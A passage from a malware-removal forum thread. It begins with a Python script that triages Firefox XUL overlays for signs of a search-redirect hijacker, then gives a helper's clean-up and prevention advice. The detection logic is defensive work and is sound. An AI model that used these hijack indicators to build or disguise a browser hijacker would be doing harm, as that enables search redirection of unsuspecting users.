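           'ask', 'search.com', 'lycos', 'rambler', 'msn', 'live')

def script_text(xul):
    """Join the inline <script> bodies of a XUL overlay (XML entities decoded)."""
    root = ET.fromstring(xul)
    return '\n'.join(el.text or '' for el in root.iter('{%s}script' % XUL_NS))

def hooked_engines(js):
    """Search engines named inside the regex literals handed to .match()."""
    bodies = re.findall(r'\.match\s*\(/((?:[^/\\]|\\.)*)/', js)
    return [e for e in ENGINES if any(e.replace('.', r'\.') in b for b in bodies)]

def triage_overlay(xul):
    """Indicators, contacted URLs, hooked engines and a verdict for one overlay."""
    js = script_text(xul)
    hits = [(i, why) for i, rx, why in INDICATORS if re.search(rx, js)]
    verdict = 'suspicious' if len(hits) >= 2 else 'review' if hits else 'clean'
    return {'indicators': [i for i, _ in hits], 'reasons': [w for _, w in hits],
            'urls': re.findall(r'https?://[^\s"\']+', js),
            'engines': hooked_engines(js), 'verdict': verdict}
```

Run it over every overlay.xul under the Firefox install and profile directories; a legitimate extension can trip one indicator, but the combination of a request observer and remote script injection is what marks the posted file.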

  5. #25
    Emeritus - Security Expert peku006
    Join Date
    Feb 2007
    Location
    Norway
    Posts
    3,103


    Hi drrchrds

    Logs look good. How's the computer running now? Any problems?
    I don't help with logs thru PM. If you have problems create a thread in the forum, please.

  6. #26
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    good!

    I think it is all clear now. No redirects and no malware/spyware found.

    Thank you for all your help!
    People like you who share your expertise in these forums are such an asset.


    Thanks again.

  7. #27
    Emeritus - Security Expert peku006
    Join Date
    Feb 2007
    Location
    Norway
    Posts
    3,103


    Hi drrchrds

    The scans are fine and it looks like your machine is clean

    Now let's uninstall ComboFix:

    • Click START then RUN
    • Now type Combofix /u in the runbox and click OK


    Now that you are clean, please follow these simple steps in order to keep your computer clean and secure:

    Disable and Enable System Restore-WINDOWS XP
    This is a good time to clear your existing system restore points and establish a new clean restore point:

    Turn off System Restore
    • On the Desktop, right-click My Computer.
    • Click Properties.
    • Click the System Restore tab.
    • Check Turn off System Restore.
    • Click Apply, and then click OK.
    • Reboot.

    Turn ON System Restore
    • On the Desktop, right-click My Computer.
    • Click Properties.
    • Click the System Restore tab.
    • UN-Check *Turn off System Restore*.
    • Click Apply, and then click OK.

    This will remove all restore points except the new one you just created.

    Here are some free programs I recommend that could help you improve your computer's security.

    Spybot Search and Destroy 1.6
    Download it from here. Just choose a mirror and off you go.
    Find the tutorial on how to use Spybot properly here

    Install SpyWare Blaster 4.0
    Download it from here
    Find the tutorial on how to use Spyware Blaster here

    Install WinPatrol
    Download it from here
    You can find information about how WinPatrol works here

    Install FireTrust SiteHound
    You can find information and download it from here

    Install MVPS Hosts File from here
    The MVPS Hosts file replaces your current HOSTS file with one containing well-known ad sites etc. Basically, this prevents your computer from connecting to those sites by redirecting them to 127.0.0.1, which is your local computer.
    Find Tutorial here : http://www.mvps.org/winhelp2002/hosts.htm

    Update your Antivirus programs and other security products regularly to avoid new threats that could infect your system.
    You can use one of these sites to check if any updates are needed for your pc.
    Secunia Software Inspector
    F-secure Health Check

    Visit Microsoft often to get the latest updates for your computer.
    http://www.update.microsoft.com

    Please check out Tony Klein's article "How did I get infected in the first place?"

    Read some information here on how to prevent malware.


    Happy safe surfing!
    I don't help with logs thru PM. If you have problems create a thread in the forum, please.
